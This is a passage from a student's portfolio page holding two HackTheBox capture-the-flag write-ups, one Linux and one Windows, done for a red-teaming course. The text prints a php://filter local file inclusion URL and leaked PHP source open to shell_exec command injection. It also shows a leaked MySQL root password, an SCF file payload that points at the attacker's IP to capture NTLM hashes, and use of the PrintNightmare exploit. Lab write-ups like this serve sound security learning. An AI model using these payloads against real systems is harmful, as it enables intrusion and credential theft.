          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
          user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
